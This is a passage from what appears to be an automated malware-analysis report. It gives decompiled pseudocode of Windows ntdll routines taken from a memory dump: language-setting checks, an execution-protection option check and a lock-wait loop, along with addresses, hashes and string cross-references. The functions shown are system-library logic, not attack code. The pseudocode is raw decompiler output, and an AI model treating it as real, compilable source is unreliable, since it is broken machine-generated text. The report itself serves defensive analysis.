					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E1E992340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E1E9AE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E1E99E2A8(_v12,  &_v68, _v16);
							if(E1E9B5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E1E9AE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E1E99E2A8(_t322,  &_v68, _t269);
							if(E1E9B5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E1E99E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E1E99E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E1E9B718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E1E99E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E1E992340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E1E9AE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E1E99E2A8(_v12,  &_v68, _v16);
						if(E1E9B5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E1E9AE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E1E99E2A8(_t322,  &_v68, _t296);
						if(E1E9B5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E1E99E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E1E99E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                    0x1e9b8788
                    0x1e9b8788
                    0x1e9b8791
                    0x1e9b8794
                    0x1e9b8798
                    0x1e9b879b
                    0x1e9b879e
                    0x1e9b87a1
                    0x1e9b87a4
                    0x1e9b87a7
                    0x1e9b87aa
                    0x1e9b87af
                    0x1ea01ad3
                    0x1e9b8b0a
                    0x1e9b8b0d
                    0x1e9b8b13
                    0x1e9b8b19
                    0x1e9b8b1f
                    0x1e9b8b25
                    0x1e9b8b2b
                    0x1e9b8b31
                    0x1e9b8b37
                    0x1e9b8b3d
                    0x1e9b8b46
                    0x1e9b8b46
                    0x1e9b87c6
                    0x1e9b87d0
                    0x1ea01ae0
                    0x1ea01ae6
                    0x1ea01af8
                    0x1ea01af8
                    0x1ea01afd
                    0x1ea01afe
                    0x1ea01b01
                    0x1ea01b06
                    0x1ea01b06
                    0x1e9b87d6
                    0x1e9b87f2
                    0x1e9b87f7
                    0x1e9b8807
                    0x1e9b880a
                    0x1e9b880f
                    0x1e9b8810
                    0x1e9b8813
                    0x1e9b8818
                    0x1e9b8818
                    0x1e9b882c
                    0x1e9b8831
                    0x1e9b8838
                    0x1e9b8908
                    0x1e9b8920
                    0x1e9b89f0
                    0x1e9b8a08
                    0x1e9b8af6
                    0x1e9b8af6
                    0x1e9b8af8
                    0x1e9b8afb
                    0x1ea01beb
                    0x1ea01beb
                    0x1e9b8b04
                    0x1ea01bf8
                    0x1ea01c0e
                    0x1ea01c13
                    0x1ea01c16
                    0x1ea01c16
                    0x1ea01bf8
                    0x00000000
                    0x1e9b8b04
                    0x1e9b8a0e
                    0x1e9b8a11
                    0x1e9b8a14
                    0x1e9b8a15
                    0x1e9b8a18
                    0x1e9b8a22
                    0x1e9b8b59
                    0x1e9b8a28
                    0x1e9b8a3c
                    0x1e9b8a3c
                    0x1e9b8a42
                    0x1ea01bb0
                    0x1ea01b11
                    0x1ea01b11
                    0x00000000
                    0x1e9b8a48
                    0x1e9b8a51
                    0x1e9b8a5b
                    0x1e9b8a5e
                    0x1e9b8a61
                    0x1e9b8a69
                    0x1e9b8a69
                    0x1e9b8a6d
                    0x00000000
                    0x00000000
                    0x1e9b8a74
                    0x1e9b8a7c
                    0x1e9b8a7d
                    0x1e9b8a91
                    0x1e9b8a93
                    0x1e9b8a93
                    0x1e9b8a98
                    0x1e9b8a9b
                    0x1e9b8aa1
                    0x1e9b8aa1
                    0x1e9b8aa4
                    0x1e9b8aaa
                    0x1e9b8ab1
                    0x1e9b8ac5
                    0x1e9b8ac7
                    0x1e9b8ac7
                    0x1e9b8ac5
                    0x1e9b8ace
                    0x1ea01bc9
                    0x1ea01bce
                    0x1ea01bd2
                    0x1ea01bd2
                    0x1e9b8ad8
                    0x1e9b8aeb
                    0x1e9b8aeb
                    0x1e9b8af0
                    0x1e9b8af4
                    0x00000000
                    0x1e9b8af4
                    0x1e9b8a42
                    0x1e9b8926
                    0x1e9b8929
                    0x1e9b892c
                    0x1e9b892d
                    0x1e9b8930
                    0x1e9b8935
                    0x1e9b893a
                    0x1e9b8b51
                    0x1e9b8940
                    0x1e9b8954
                    0x1e9b8954
                    0x1e9b895a
                    0x1ea01b63
                    0x00000000
                    0x1e9b8960
                    0x1e9b8969
                    0x1e9b8973
                    0x1e9b8976
                    0x1e9b8979
                    0x1e9b897e
                    0x1e9b8981
                    0x1e9b8981
                    0x1e9b8986
                    0x00000000
                    0x00000000
                    0x1ea01b6e
                    0x1ea01b74
                    0x1ea01b7b
                    0x1ea01b8f
                    0x1ea01b91
                    0x1ea01b91
                    0x1ea01b99
                    0x1ea01b9c
                    0x1ea01ba2
                    0x1ea01ba2
                    0x1e9b898c
                    0x1e9b8992
                    0x1e9b8999
                    0x1e9b89ad
                    0x1ea01ba8
                    0x1ea01ba8
                    0x1e9b89ad
                    0x1e9b89b6
                    0x1e9b89c8
                    0x1e9b89cd
                    0x1e9b89d0
                    0x1e9b89d0
                    0x1e9b89d6
                    0x1e9b89e8
                    0x1e9b89e8
                    0x1e9b89ed
                    0x00000000
                    0x1e9b89ed
                    0x1e9b895a
                    0x1e9b883e
                    0x1e9b8841
                    0x1e9b8844
                    0x1e9b8845
                    0x1e9b8848
                    0x1e9b884d
                    0x1e9b8852
                    0x1e9b8b49
                    0x1e9b8858
                    0x1e9b886c
                    0x1e9b886c
                    0x1e9b8872
                    0x1ea01b0e
                    0x00000000
                    0x1e9b8878
                    0x1e9b8881
                    0x1e9b888b
                    0x1e9b888e
                    0x1e9b8891
                    0x1e9b8896
                    0x1e9b8899
                    0x1e9b8899
                    0x1e9b889e
                    0x00000000
                    0x00000000
                    0x1ea01b21
                    0x1ea01b27
                    0x1ea01b2e
                    0x1ea01b42
                    0x1ea01b44
                    0x1ea01b44
                    0x1ea01b4c
                    0x1ea01b4f
                    0x1ea01b55
                    0x1ea01b55
                    0x1e9b88a4
                    0x1e9b88aa
                    0x1e9b88b1
                    0x1e9b88c5
                    0x1ea01b5b
                    0x1ea01b5b
                    0x1e9b88c5
                    0x1e9b88ce
                    0x1e9b88e0
                    0x1e9b88e5
                    0x1e9b88e8
                    0x1e9b88e8
                    0x1e9b88ee
                    0x1e9b8900
                    0x1e9b8900
                    0x1e9b8905
                    0x00000000
                    0x1e9b8905

                    APIs
                    Strings
                    • Kernel-MUI-Language-SKU, xrefs: 1E9B89FC
                    • Kernel-MUI-Number-Allowed, xrefs: 1E9B87E6
                    • WindowsExcludedProcs, xrefs: 1E9B87C1
                    • Kernel-MUI-Language-Disallowed, xrefs: 1E9B8914
                    • Kernel-MUI-Language-Allowed, xrefs: 1E9B8827
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: _wcspbrk
                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                    • API String ID: 402402107-258546922
                    • Opcode ID: 042f0cdc2b6a7ead6317a2112f6fde97d9549298915c98d61fc726066c3e8d34
                    • Instruction ID: c0648b6b7dcf2e7ffe103e0f1c4c9119131cf723931002540e6fae221dfc6b5d
                    • Opcode Fuzzy Hash: 042f0cdc2b6a7ead6317a2112f6fde97d9549298915c98d61fc726066c3e8d34
                    • Instruction Fuzzy Hash: 8BF1A3B6D00249EFCF11DFA5D980DEEB7B9FB48200F114A6EE505AB210E735AA45DF60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1E9C7EFD, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 127COMMON
                    Download Yara Rule
                    C-Code - Quality: 64%
                    			E1E9C7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x1ea72088; // 0x7770ec78
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E1E9C7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E1E9E3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E1E99DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x1ea74218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E1E9E3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E1E9A0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E1E9E3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E1E9A8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E1E9E3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E1EA0E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E1E9E3F92();
					_t38 = 1;
					L2:
					return E1E99E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                    0x1e9c7f08
                    0x1e9c7f0f
                    0x1e9c7f12
                    0x1e9c7f1b
                    0x1e9c7f31
                    0x1e9e3ead
                    0x1e9e3eb4
                    0x00000000
                    0x00000000
                    0x1e9e3eba
                    0x1e9e3ecd
                    0x1e9e3ed2
                    0x1e9e3ee1
                    0x1e9e3ee7
                    0x1e9e3eec
                    0x1e9e3f12
                    0x1e9e3f18
                    0x1e9e3f1a
                    0x00000000
                    0x00000000
                    0x1e9e3f20
                    0x1e9e3f26
                    0x1e9e3f28
                    0x00000000
                    0x00000000
                    0x1e9e3f2e
                    0x1e9e3f30
                    0x00000000
                    0x00000000
                    0x1e9e3f3a
                    0x1e9e3f3b
                    0x1e9e3f53
                    0x1e9e3f64
                    0x1e9e3f69
                    0x1e9e3f6c
                    0x1e9e3f6d
                    0x1e9e3f6f
                    0x1e9ee304
                    0x1e9ee30f
                    0x1e9ee315
                    0x1e9ee31e
                    0x1e9ee321
                    0x1e9ee327
                    0x1e9ee329
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x1e9ee32f
                    0x1e9ee32f
                    0x1e9ee337
                    0x1e9ee33a
                    0x1e9ee33b
                    0x1e9ee33d
                    0x1e9ee33f
                    0x1e9ee341
                    0x1e9ee341
                    0x1e9ee34e
                    0x1e9ee353
                    0x1e9ee358
                    0x1e9ee35d
                    0x1e9ee35f
                    0x00000000
                    0x00000000
                    0x1e9ee365
                    0x1e9ee365
                    0x1e9ee368
                    0x1e9ee36e
                    0x00000000
                    0x00000000
                    0x1e9ee374
                    0x1e9ee32f
                    0x1e9e3f75
                    0x1e9e3f7a
                    0x1e9e3f7c
                    0x1e9e3f7e
                    0x1e9e3f86
                    0x1e9c7f39
                    0x1e9c7f47
                    0x1e9c7f47
                    0x1e9c7f37
                    0x1e9c7f37
                    0x00000000

                    APIs
                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 1E9E3F12
                    Strings
                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1E9EE2FB
                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 1E9EE345
                    • ExecuteOptions, xrefs: 1E9E3F04
                    • xpwpz~, xrefs: 1E9C7F08
                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1E9E3F4A
                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1E9E3EC4
                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1E9E3F75
                    • Execute=1, xrefs: 1E9E3F5E
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: BaseDataModuleQuery
                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$xpwpz~
                    • API String ID: 3901378454-3101507724
                    • Opcode ID: 55adef1e65e2d3513c64afe68042047e9f1f5939748c011a11f498a741cd6ba5
                    • Instruction ID: a3f7447c8a2c13b54b165de1b517ca9305ad70892889be868920bbae945cbf30
                    • Opcode Fuzzy Hash: 55adef1e65e2d3513c64afe68042047e9f1f5939748c011a11f498a741cd6ba5
                    • Instruction Fuzzy Hash: AB41C87654025C7ADF21DAA4DCC5FDE73BCAF98700F000AADE605E7180EB70AA859F61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1E9B53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                    Download Yara Rule
                    C-Code - Quality: 44%
                    			E1E9B53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x1ea701c0;
									_push(_t92);
									_push(0);
									_t37 = E1E98F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E1E9D4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E1E9E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E1E9E3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E1EA1217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E1E9E3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E1E9D3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E1E9B5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E1E98F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E1E9D3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E1E98F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E1E9D3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E1E98F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E1E9D3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E1E9B5329(_t74, _t92);
													_push(1);
													return E1E9B53A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

























                    0x1e9b53ab
                    0x1e9b53ae
                    0x1e9b53b1
                    0x1e9b53b4
                    0x1e9b53b7
                    0x1e9d05b6
                    0x1e9d05c0
                    0x1e9d05c3
                    0x00000000
                    0x1e9d05c9
                    0x1e9d05c9
                    0x1e9d05cc
                    0x1e9d05d5
                    0x1e9d05d5
                    0x1e9b53bd
                    0x1e9b53bd
                    0x1e9b53bd
                    0x1e9b53be
                    0x1e9b53be
                    0x1e9b53be
                    0x1e9b53c0
                    0x00000000
                    0x00000000
                    0x1e9f2269
                    0x1e9f226d
                    0x1e9f2349
                    0x1e9f234d
                    0x1e9f2273
                    0x1e9f2276
                    0x1e9f2279
                    0x1e9f227e
                    0x1e9f2283
                    0x1e9f2287
                    0x1e9f228a
                    0x1e9f228d
                    0x1e9f228f
                    0x1e9f22bc
                    0x1e9f22bc
                    0x1e9f22bc
                    0x1e9f22be
                    0x1e9f22c4
                    0x1e9f22cc
                    0x1e9f22d0
                    0x1e9f22d6
                    0x1e9f22d7
                    0x1e9f22da
                    0x1e9f22df
                    0x1e9f22e4
                    0x00000000
                    0x00000000
                    0x1e9f22e6
                    0x1e9f22e9
                    0x1e9f22f4
                    0x1e9f22f9
                    0x1e9f22fa
                    0x1e9f2305
                    0x1e9f2314
                    0x1e9f2319
                    0x1e9f231a
                    0x1e9f231d
                    0x1e9f2320
                    0x1e9f2323
                    0x1e9f2323
                    0x1e9f2328
                    0x1e9f232d
                    0x1e9f232f
                    0x1e9f2331
                    0x1e9f2336
                    0x1e9f2336
                    0x1e9f233b
                    0x1e9f233d
                    0x1e9f2350
                    0x1e9f2351
                    0x1e9f2356
                    0x1e9f2359
                    0x1e9f2359
                    0x1e9f235b
                    0x1e9f235d
                    0x1e9b5367
                    0x1e9b536b
                    0x1e9b5372
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x1e9f2363
                    0x1e9f2363
                    0x1e9f2369
                    0x1e9f236a
                    0x1e9f236c
                    0x1e9f2371
                    0x1e9f2373
                    0x00000000
                    0x1e9f2379
                    0x1e9f2379
                    0x1e9f237a
                    0x1e9f237f
                    0x1e9f237f
                    0x1e9f2385
                    0x1e9f2386
                    0x1e9f2389
                    0x1e9f238e
                    0x1e9f2390
                    0x1e9b5378
                    0x1e9b537c
                    0x1e9f2396
                    0x1e9f2396
                    0x1e9f2397
                    0x1e9f239c
                    0x1e9f23a2
                    0x1e9f23a3
                    0x1e9f23a6
                    0x1e9f23ab
                    0x1e9f23ad
                    0x00000000
                    0x1e9f23b3
                    0x1e9f23b3
                    0x1e9f23b4
                    0x1e9f23b9
                    0x1e9f23ba
                    0x1e9f23ba
                    0x1e9f23bc
                    0x1e9f23bf
                    0x00000000
                    0x00000000
                    0x1e9e9153
                    0x1e9e9158
                    0x1e9e915a
                    0x1e9e915e
                    0x1e9e9160
                    0x00000000
                    0x1e9e9166
                    0x1e9e9166
                    0x1e9e9171
                    0x1e9e9176
                    0x1e9e9176
                    0x00000000
                    0x1e9e9160
                    0x1e9f23c6
                    0x1e9f23cb
                    0x1e9f23d7
                    0x1e9f23d7
                    0x1e9f23ad
                    0x1e9f2390
                    0x1e9f2373
                    0x1e9f233f
                    0x1e9f233f
                    0x00000000
                    0x1e9f233f
                    0x1e9f2291
                    0x1e9f2291
                    0x1e9f2293
                    0x1e9f2295
                    0x1e9f229a
                    0x1e9f22a1
                    0x1e9f22a3
                    0x1e9f22a7
                    0x1e9f22a9
                    0x00000000
                    0x00000000
                    0x1e9f22ab
                    0x1e9f22ad
                    0x1e9f22af
                    0x00000000
                    0x00000000
                    0x00000000
                    0x1e9f22af
                    0x1e9f22b1
                    0x1e9f22b4
                    0x1e9f22b4
                    0x1e9f22b6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x1e9f22b6
                    0x1e9f228f
                    0x00000000
                    0x1e9f226d
                    0x1e9b53cb
                    0x1e9b53ce
                    0x1e9b53d0
                    0x1e9b53d4
                    0x1e9b53d6
                    0x00000000
                    0x1e9b53d8
                    0x1e9b53e3
                    0x1e9b53ea
                    0x1e9b53ea
                    0x1e9b53d6
                    0x00000000

                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1E9F22F4
                    Strings
                    • RTL: Re-Waiting, xrefs: 1E9F2328
                    • RTL: Resource at %p, xrefs: 1E9F230B
                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 1E9F22FC
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                    • API String ID: 885266447-871070163
                    • Opcode ID: 9966fd0ffe75833f5fd2ce854f9db5ab673669feb84fa795e81da343f758f5ea
                    • Instruction ID: fd9b1a4e536c891c6b94d7ba9989a087bdc76b063a81da2e1858c2f45408fcdf
                    • Opcode Fuzzy Hash: 9966fd0ffe75833f5fd2ce854f9db5ab673669feb84fa795e81da343f758f5ea
                    • Instruction Fuzzy Hash: CD511675600756ABDB06CF24DC80F96779EAF88724F114B5DFD09DB280EB61E8418FA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1E9BEC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                    Download Yara Rule
                    C-Code - Quality: 51%
                    			E1E9BEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
